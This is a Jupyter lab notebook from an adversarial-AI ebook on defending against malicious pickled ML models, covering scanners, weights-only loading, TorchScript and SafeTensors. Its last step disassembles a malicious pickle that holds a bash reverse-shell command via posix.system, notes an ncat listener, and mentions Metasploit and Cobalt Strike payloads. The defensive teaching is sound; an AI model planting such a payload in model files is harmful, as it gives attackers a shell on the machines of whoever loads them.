<img style="max-width:20em; height:auto;" src="../graphics/A-Little-Book-on-Adversarial-AI-Cover.png"/>

Author: Nik Alleyne   
Author Blog: https://www.securitynik.com   
Author GitHub: github.com/securitynik   

Author Other Books: [   

            "https://www.amazon.ca/Learning-Practicing-Leveraging-Practical-Detection/dp/1731254458/",   
            
            "https://www.amazon.ca/Learning-Practicing-Mastering-Network-Forensics/dp/1775383024/"   
        ]   


This notebook ***(fickling_mitigations.ipynb)*** is part of the series of notebooks From ***A Little Book on Adversarial AI***  A free ebook released by Nik Alleyne

### Fickling Mitigations 

### Lab Objectives:   
- Implement mitigations to address the pickle file format vulnerability   
- Look at additional ways to address the risk associated with model modification   


### Step 1:  

In [1]:
# Import some libraries
import torch
import torch.nn as nn
import torch.nn.functional as F

In [2]:
### Version of key libraries used  
print(f'Torch version used:  {torch.__version__}')

Torch version used:  2.7.1+cu128


In [3]:
# Setup the device to work with
# This should ensure if there are accelerators in place, such as Apple backend or CUDA, 
# we should be able to take advantage of it.

if torch.cuda.is_available():
    print('Setting the device to cuda')
    device = 'cuda'
elif torch.backends.mps.is_available():
    print('Setting the device to Apple mps')
    device = 'mps'
else:
    print('Setting the device to CPU')
    device = torch.device('cpu')

Setting the device to cuda


In [4]:
# Recall all the models we use and pickle scan them
# target both file and directory

In [5]:
# Let's start with scanning
# We see it is reporting about dangerous imports
# Specifically the **exec** command
!picklescan --path /tmp/my_trusted_simple_model.pth

/tmp/my_trusted_simple_model.pth:my_trusted_simple_model/data.pkl: dangerous import 'builtins exec' FOUND
----------- SCAN SUMMARY -----------
Scanned files: 1
Infected files: 1
Dangerous globals: 1


In [6]:
# We can also use the fickling library that was used to create the malicious pickle to trace it
# Interesting. We know we compromised this file
# Also above, it reports infected
# We used trace earlier on pickle file, this is using Torch's new zip format
!fickling --trace /tmp/my_trusted_simple_model.pth

Error: No pickle files detected


In [7]:
# let us try another tool.
# This time we use modelscan
!modelscan -p /tmp/my_trusted_simple_model.pth

/bin/bash: line 1: modelscan: command not found


In [8]:
#We can build on this with static analysis by running strings on our samples
#!strings --all --bytes=10 /tmp/r_forest.onnx

In [9]:
#If you are interested, you can also look at the raw bytes via a hex editor  
!xxd -l 64 /tmp/r_forest.onnx

00000000: [1;31m08[0m[1;33m0a[0m [1;31m12[0m[1;31m08[0m [1;32m73[0m[1;32m6b[0m [1;32m6c[0m[1;32m32[0m [1;32m6f[0m[1;32m6e[0m [1;32m6e[0m[1;32m78[0m [1;31m1a[0m[1;31m06[0m [1;32m31[0m[1;32m2e[0m  [1;31m.[0m[1;33m.[0m[1;31m.[0m[1;31m.[0m[1;32ms[0m[1;32mk[0m[1;32ml[0m[1;32m2[0m[1;32mo[0m[1;32mn[0m[1;32mn[0m[1;32mx[0m[1;31m.[0m[1;31m.[0m[1;32m1[0m[1;32m.[0m
00000010: [1;32m31[0m[1;32m39[0m [1;32m2e[0m[1;32m31[0m [1;32m22[0m[1;31m07[0m [1;32m61[0m[1;32m69[0m [1;32m2e[0m[1;32m6f[0m [1;32m6e[0m[1;32m6e[0m [1;32m78[0m[1;32m28[0m [1;37m00[0m[1;32m32[0m  [1;32m1[0m[1;32m9[0m[1;32m.[0m[1;32m1[0m[1;32m"[0m[1;31m.[0m[1;32ma[0m[1;32mi[0m[1;32m.[0m[1;32mo[0m[1;32mn[0m[1;32mn[0m[1;32mx[0m[1;32m([0m[1;37m.[0m[1;32m2[0m
00000020: [1;37m00[0m[1;32m3a[0m [1;31md7[0m[1;31m95[0m [1;31m05[0m[1;33m0a[0m [1;31md8[0m[1;31m93[0m [1;31m05[0m[1;33m0a[0m [1;31m01[0m[

In [10]:
# First, we can ensure if we don't trust the source of the model, 
# that we load only the weights and not the full model
# This can be achieved by
with torch.no_grad():
    loaded_trusted_pwnd_model = torch.load('/tmp/my_trusted_simple_model.pth', weights_only=True)
    
#loaded_trusted_pwnd_model


UnpicklingError: Weights only load failed. This file can still be loaded, to do so you have two options, [1mdo those steps only if you trust the source of the checkpoint[0m. 
	(1) In PyTorch 2.6, we changed the default value of the `weights_only` argument in `torch.load` from `False` to `True`. Re-running `torch.load` with `weights_only` set to `False` will likely succeed, but it can result in arbitrary code execution. Do it only if you got the file from a trusted source.
	(2) Alternatively, to load with `weights_only=True` please check the recommended steps in the following error message.
	WeightsUnpickler error: Unsupported global: GLOBAL exec was not an allowed global by default. Please use `torch.serialization.add_safe_globals([exec])` or the `torch.serialization.safe_globals([exec])` context manager to allowlist this global if you trust this class/function.

Check the documentation of torch.load to learn more about types accepted by default with weights_only https://pytorch.org/docs/stable/generated/torch.load.html.

Above fails. Which means we will not be able to use this model if we try loading the weight only. However, place close attention to the last few lines  
As see above in the last few lines, there is the message about  
**WeightsUnpickler error: Unsupported global: GLOBAL builtins.exec was not an allowed global by default**  
This immediately tells us there might be a potential problem here. Also we see  
Re-running `torch.load` with `weights_only` set to `False` will likely succeed, **but it can result in arbitrary code execution. Do it only if you got the file from a trusted source.**

So above, we were able to run arbitrary code because we had *weights_only=False*   


### Step 2:   

In [11]:
# Bring back some data
# Create a dummy model
from sklearn.datasets import make_classification

X, y = make_classification(n_samples=100, n_classes=2, random_state=10)
X = torch.tensor(data=X, dtype=torch.float32, device=device)
y = torch.tensor(data = y.reshape(-1, 1), dtype=torch.float32, device=device)

In [12]:
# Re-create a simple torch network
class SimpleNet(nn.Module):
    def __init__(self,):
        super().__init__()
        self.layers = nn.Sequential( 
            nn.Linear(in_features=X.size(dim=1), out_features=8),
            nn.ReLU(),
            nn.Linear(in_features=8, out_features=1),
            nn.Sigmoid()
        )
    
    def forward(self, x):
        out = self.layers(x)
        return out

In [13]:
# If you wish to test the model's availaility to make predictions
simple_net = SimpleNet().to(device=device)
simple_net(X)[:10]

tensor([[0.5052],
        [0.4907],
        [0.4782],
        [0.3982],
        [0.3448],
        [0.3816],
        [0.4295],
        [0.5640],
        [0.3775],
        [0.5036]], device='cuda:0', grad_fn=<SliceBackward0>)

In [14]:
# Let's try a different approach. I RECOMMEND USING THIS!
# In this instance, let's use Torchscript.
# Torchscript is a very common way to use the model to make inference
# Generally when we save our model, it is for someone else to use to make inference.
# Let's use that format instead

simple_model = SimpleNet().to(device=device)
more_secured_model = torch.jit.script(obj=simple_model)
more_secured_model.save(f='/tmp/my_more_secured_model.pth')

# Verify the file was created
!ls /tmp/my_more_secured_model.pth

# Get the file integrity
!md5sum /tmp/my_more_secured_model.pth


/tmp/my_more_secured_model.pth
1bd188e550f27eefb2945228d41b1378  /tmp/my_more_secured_model.pth


In [15]:
# We can then load this model to make inference
loaded_secured_model = torch.jit.load(f='/tmp/my_more_secured_model.pth', map_location=device)
loaded_secured_model

RecursiveScriptModule(
  original_name=SimpleNet
  (layers): RecursiveScriptModule(
    original_name=Sequential
    (0): RecursiveScriptModule(original_name=Linear)
    (1): RecursiveScriptModule(original_name=ReLU)
    (2): RecursiveScriptModule(original_name=Linear)
    (3): RecursiveScriptModule(original_name=Sigmoid)
  )
)

In [16]:
# Put the model in eval mode
# We call the .eval method to disable any batch normalization, dropout, etc
# In this case we don't have those layers
# However, it is a good habit to call this method
loaded_secured_model.eval()

# Make a sample prediction, to confirm the modem is working well
loaded_secured_model(X[:5])

tensor([[0.6325],
        [0.5591],
        [0.5844],
        [0.5642],
        [0.5455]], device='cuda:0', grad_fn=<SigmoidBackward0>)

### Step 3:   

# SafeTensors  
- https://huggingface.co/docs/safetensors/index
- https://github.com/huggingface/safetensors
- Alternatively, we can use SafeTensors
- This is a format that is gaining popularity. It does require a bit more work but let's understand the work

In [17]:
# importing the safetensors library
from safetensors.torch import save_file, safe_open

In [18]:
# Verify the layers we have
simple_model.state_dict

<bound method Module.state_dict of SimpleNet(
  (layers): Sequential(
    (0): Linear(in_features=20, out_features=8, bias=True)
    (1): ReLU()
    (2): Linear(in_features=8, out_features=1, bias=True)
    (3): Sigmoid()
  )
)>

In [19]:
# Grab a sample parameter from each layer
tmp_safe_tensor = {
    'fc1.weight' : simple_model.layers[0].weight,
    'fc1.bias' : simple_model.layers[0].bias
}


In [20]:
# Now the reality is, no one wants to do that for a model that has many layers, let's make this a bit simpler
# Setup an empty dictionary
simple_model_safe_tensors = {}

# Automate the process of creating the keys and values
for item in simple_model.state_dict().items():
    simple_model_safe_tensors[item[0]] = item[1]

# Verify the dictionary has been properly created
simple_model_safe_tensors

{'layers.0.weight': tensor([[ 0.1340,  0.0428,  0.1601,  0.1333,  0.1239,  0.1645, -0.0590, -0.1074,
          -0.0420,  0.1007, -0.0829, -0.0661,  0.1732, -0.0977, -0.0719,  0.1165,
           0.1505,  0.1343,  0.0481, -0.0843],
         [-0.1467, -0.0027, -0.1441, -0.2104,  0.1514, -0.1792,  0.2200, -0.1609,
           0.2206, -0.1045,  0.2210, -0.2003,  0.0717,  0.1599, -0.1202, -0.0942,
           0.0315, -0.0715, -0.1693, -0.1950],
         [-0.0473,  0.1902, -0.0504, -0.0600,  0.0421, -0.0924,  0.2086,  0.0063,
           0.0369, -0.1246, -0.0786, -0.0630, -0.0231, -0.1015, -0.0784,  0.1539,
           0.1334,  0.1037,  0.2185,  0.1916],
         [-0.0980, -0.0822, -0.1821, -0.0688,  0.1837, -0.1766, -0.0271,  0.0261,
           0.1777, -0.1705, -0.0655, -0.2209,  0.0266,  0.0619, -0.2003, -0.1742,
           0.0639, -0.0142,  0.0181,  0.1082],
         [-0.1875,  0.1406,  0.0788,  0.0143,  0.1283, -0.1361,  0.1421, -0.0797,
          -0.1659,  0.0244, -0.0199, -0.0388, -0.0943, 

In [21]:
# Now let's save the model
# We add some metadata if we want via a dictionary
save_file(tensors=simple_model_safe_tensors, filename=r'/tmp/simple_model.safetensors', metadata={'Author' : 'SecurityNik', 'course': 'SANS SEC 5'})

# Verify the file is saved
!ls /tmp/simple_model.safetensors

# Verify the file integrity
!md5sum /tmp/simple_model.safetensors


/tmp/simple_model.safetensors
fe1c568f98808892213f7ee4e9cc2437  /tmp/simple_model.safetensors


In [22]:
# Fine, let's reload the model now to make predictions.
loaded_safe_tensor_state_dict = {}
with safe_open(filename=r'/tmp/simple_model.safetensors', framework='pt') as safe_model:
    for key in safe_model.keys():
        loaded_safe_tensor_state_dict[key] = safe_model.get_tensor(key)

# View the loaded model
loaded_safe_tensor_state_dict

{'layers.0.bias': tensor([-0.1662,  0.2066,  0.1746,  0.1116, -0.0554, -0.0147,  0.0900, -0.1279]),
 'layers.0.weight': tensor([[ 0.1340,  0.0428,  0.1601,  0.1333,  0.1239,  0.1645, -0.0590, -0.1074,
          -0.0420,  0.1007, -0.0829, -0.0661,  0.1732, -0.0977, -0.0719,  0.1165,
           0.1505,  0.1343,  0.0481, -0.0843],
         [-0.1467, -0.0027, -0.1441, -0.2104,  0.1514, -0.1792,  0.2200, -0.1609,
           0.2206, -0.1045,  0.2210, -0.2003,  0.0717,  0.1599, -0.1202, -0.0942,
           0.0315, -0.0715, -0.1693, -0.1950],
         [-0.0473,  0.1902, -0.0504, -0.0600,  0.0421, -0.0924,  0.2086,  0.0063,
           0.0369, -0.1246, -0.0786, -0.0630, -0.0231, -0.1015, -0.0784,  0.1539,
           0.1334,  0.1037,  0.2185,  0.1916],
         [-0.0980, -0.0822, -0.1821, -0.0688,  0.1837, -0.1766, -0.0271,  0.0261,
           0.1777, -0.1705, -0.0655, -0.2209,  0.0266,  0.0619, -0.2003, -0.1742,
           0.0639, -0.0142,  0.0181,  0.1082],
         [-0.1875,  0.1406,  0.0788, 

In [23]:
# Re-create a simple torch network
class SimpleModelReconstructed(nn.Module):
    def __init__(self,):
        super().__init__()
        self.layers = nn.Sequential( 
            nn.Linear(in_features=X.size(dim=1), out_features=8),
            nn.ReLU(),
            nn.Linear(in_features=8, out_features=1),
            nn.Sigmoid()
        )
    
    def forward(self, x):
        out = self.layers(x)
        return out

In [24]:
# Instantiate the model
simple_model_reconstructed = SimpleModelReconstructed().to(device=device)
simple_model_reconstructed

SimpleModelReconstructed(
  (layers): Sequential(
    (0): Linear(in_features=20, out_features=8, bias=True)
    (1): ReLU()
    (2): Linear(in_features=8, out_features=1, bias=True)
    (3): Sigmoid()
  )
)

In [25]:
# Load the state dictionary
simple_model_reconstructed.load_state_dict(state_dict=loaded_safe_tensor_state_dict)

<All keys matched successfully>

In [26]:
# Make predictions on the new model
simple_model_reconstructed(X[:10])

tensor([[0.6325],
        [0.5591],
        [0.5844],
        [0.5642],
        [0.5455],
        [0.5283],
        [0.5937],
        [0.5100],
        [0.5327],
        [0.6260]], device='cuda:0', grad_fn=<SigmoidBackward0>)

With all of these strategies in place, there is still the simples one we can use.  The simplest strategy is to encrypt the saved models, hash and store the keys and hash in an environment variable. Also with this strategy, there is no need for us to import the other modules

Revisit this the notebook: **hash_enc_logging.ipynb** for additional guidance.  

### Step 4:  

In [27]:
# As a final step, if you wish to dig a big deeper we can disassemble the pickle file
# https://docs.python.org/3/library/pickletools.html
import pickletools

In [28]:
# This is one option to load the model. 
# However, this should only be used for models you trust
# As can be seen below, there is information about bash and an attempt to connect to a remote host
# Ensure you setup your listener 
#   $ ncat --listen --verbose 9999 
!python -m pickle /tmp/malicious.pkl

0


In [29]:
# Let's try this the correct way now
# This now shows us we have a 'posix' command
# We also see the 'system' command 
# and finally the backdoor code
# As you should have noticed, this did not attempt to run the program but simply disassemble it
!python -m pickletools /tmp/malicious.pkl

    0: \x80 PROTO      4
    2: \x95 FRAME      83
   11: \x8c SHORT_BINUNICODE 'posix'
   18: \x94 MEMOIZE    (as 0)
   19: \x8c SHORT_BINUNICODE 'system'
   27: \x94 MEMOIZE    (as 1)
   28: \x93 STACK_GLOBAL
   29: \x94 MEMOIZE    (as 2)
   30: \x8c SHORT_BINUNICODE "/bin/bash -c 'bash -i >& /dev/tcp/127.0.0.1/9999 0>&1 &'"
   88: \x94 MEMOIZE    (as 3)
   89: \x85 TUPLE1
   90: \x94 MEMOIZE    (as 4)
   91: R    REDUCE
   92: \x94 MEMOIZE    (as 5)
   93: .    STOP
highest protocol among opcodes = 4


In [30]:
# Let's extend on this a bit to understand what some of these opcodes are doing
!python -m pickletools --annotate /tmp/malicious.pkl

    0: \x80 PROTO      4              Protocol version indicator.
    2: \x95 FRAME      83             Indicate the beginning of a new frame.
   11: \x8c SHORT_BINUNICODE 'posix'  Push a Python Unicode string object.
   18: \x94 MEMOIZE    (as 0)         Store the stack top into the memo.  The stack is not popped.
   19: \x8c SHORT_BINUNICODE 'system' Push a Python Unicode string object.
   27: \x94 MEMOIZE    (as 1)         Store the stack top into the memo.  The stack is not popped.
   28: \x93 STACK_GLOBAL              Push a global object (module.attr) on the stack.
   29: \x94 MEMOIZE    (as 2)         Store the stack top into the memo.  The stack is not popped.
   30: \x8c SHORT_BINUNICODE "/bin/bash -c 'bash -i >& /dev/tcp/127.0.0.1/9999 0>&1 &'" Push a Python Unicode string object.
   88: \x94 MEMOIZE    (as 3)         Store the stack top into the memo.  The stack is not popped.
   89: \x85 TUPLE1                    Build a one-tuple out of the topmost item on the stack.
   90

In this final mitigation, as you can see, we have multiple layers in place. We are taking advantage of hashing, encryption, validation of the file path and more importantly, using the ONNX format which is considered by scikit learn to be the most secured way to save a model at the time of this writing.

While we have used some interesting ways for gaining access to systems via the models, there is nothing stopping you from using Metasploit payload. Maybe you are interested instead in Cobalt Strike?


https://hiddenlayer.com/innovation-hub/pickle-strike/


### Lab Takeaways:   
- We've now look at ways to mitigate the threat with our models being modified   